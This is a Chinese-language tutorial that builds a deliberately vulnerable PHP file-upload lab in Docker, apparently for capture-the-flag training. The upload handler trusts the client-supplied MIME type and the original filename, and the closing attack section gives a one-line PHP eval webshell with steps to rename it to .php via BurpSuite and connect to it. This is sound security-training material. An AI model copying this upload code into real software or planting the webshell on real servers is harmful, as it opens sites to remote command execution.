文件上传靶场

文件上传靶场

项目结构

upload-lab/
├── Dockerfile
└── www
    ├── index.php
    └── upload
        └── flag.txt

执行命令流程（逐行执行）

创建目录结构

# 创建目录结构
mkdir upload-lab;cd upload-lab
mkdir -p www/upload

# 创建flag文件
echo "flag{9PnZtLwEfR6vGhJ4}" > www/upload/flag.txt

写入Dockerfile

cat > Dockerfile <<EOF
FROM php:7.4-apache

# 创建上传目录并设置权限
RUN mkdir -p /var/www/html/upload && \
    chown -R www-data:www-data /var/www/html && \
    chmod -R 755 /var/www/html

# 复制网站文件
COPY www/ /var/www/html/

# 设置flag文件
RUN echo "flag{you hack the upload lab}" > /var/www/html/upload/flag.txt && \
    chmod 644 /var/www/html/upload/flag.txt

# 配置Apache
EXPOSE 80
EOF

写入PHP主文件index.php

touch www/index.php
cat > www/index.php <<'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>提交你喜欢的图片！</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; background-color: #f0f0f0; }
        .container { max-width: 800px; margin: 0 auto; background: white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
        h1 { color: #333; text-align: center; margin-bottom: 30px; }
        .upload-box { border: 2px dashed #ccc; padding: 20px; text-align: center; margin-bottom: 20px; }
        .form-group { margin: 15px 0; }
        input[type="file"] { padding: 10px; background: #f8f8f8; border: 1px solid #ddd; }
        input[type="submit"] { background: #4CAF50; color: white; padding: 12px 24px; border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }
        input[type="submit"]:hover { background: #45a049; }
        .result { margin-top: 20px; padding: 15px; border-radius: 4px; }
        .success { background: #dff0d8; color: #3c763d; }
        .error { background: #f2dede; color: #a94442; }
    </style>
</head>
<body>
    <div class="container">
        <h1>图片上传入口</h1>
        <div class="upload-box">
            <form enctype="multipart/form-data" method="POST">
                <input type="hidden" name="MAX_FILE_SIZE" value="100000" />
                <div class="form-group">
                    <label>选择图片（JPEG/PNG，最大100KB）：</label><br>
                    <input type="file" name="uploaded" required>
                </div>
                <input type="submit" name="Upload" value="上传图片">
            </form>
        </div>
        <?php
        if(isset($_POST['Upload'])) {
            $upload_dir = "upload/";
            $target_file = $upload_dir . basename($_FILES['uploaded']['name']);
            
            $uploaded_type = $_FILES['uploaded']['type'];
            $uploaded_size = $_FILES['uploaded']['size'];
            
            $html = '<div class="result ';
            
            if(($uploaded_type == "image/jpeg" || $uploaded_type == "image/png") && $uploaded_size < 100000) {
                if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_file)) {
                    $html .= 'success">文件上传成功，保存路径：'.htmlspecialchars($target_file);
                } else {
                    $html .= 'error">上传失败 - 系统错误';
                }
            } else {
                $html .= 'error">无效的文件类型或大小（仅支持JPEG/PNG，最大100KB）';
            }
            echo $html.'</div>';
        }
        ?>
    </div>
</body>
</html>
EOF

docker一键搭建

# 构建镜像
docker build -t upload-lab .

# 运行容器
docker run -d -p 8002:80 --name upload-lab-container upload-lab

进入容器，然后设置容器内部的权限：

# 进入容器
docker exec -it upload-lab-container bash

# 查看当前目录位置
cd /var/www/html/upload

# 设置上传目录权限
chmod 777 .

# 退出容器
exit

攻击过程

1. 创建webshell文件shell.jpg 内容：<?php @eval($_POST['cmd']);?>
2. 使用BurpSuite修改上传文件名为shell.jpg.php
3. 上传成功后使用蚁剑连接http://靶机IP:8002/upload/生成的文件名
4. 在webshell中执行命令读取flag.txt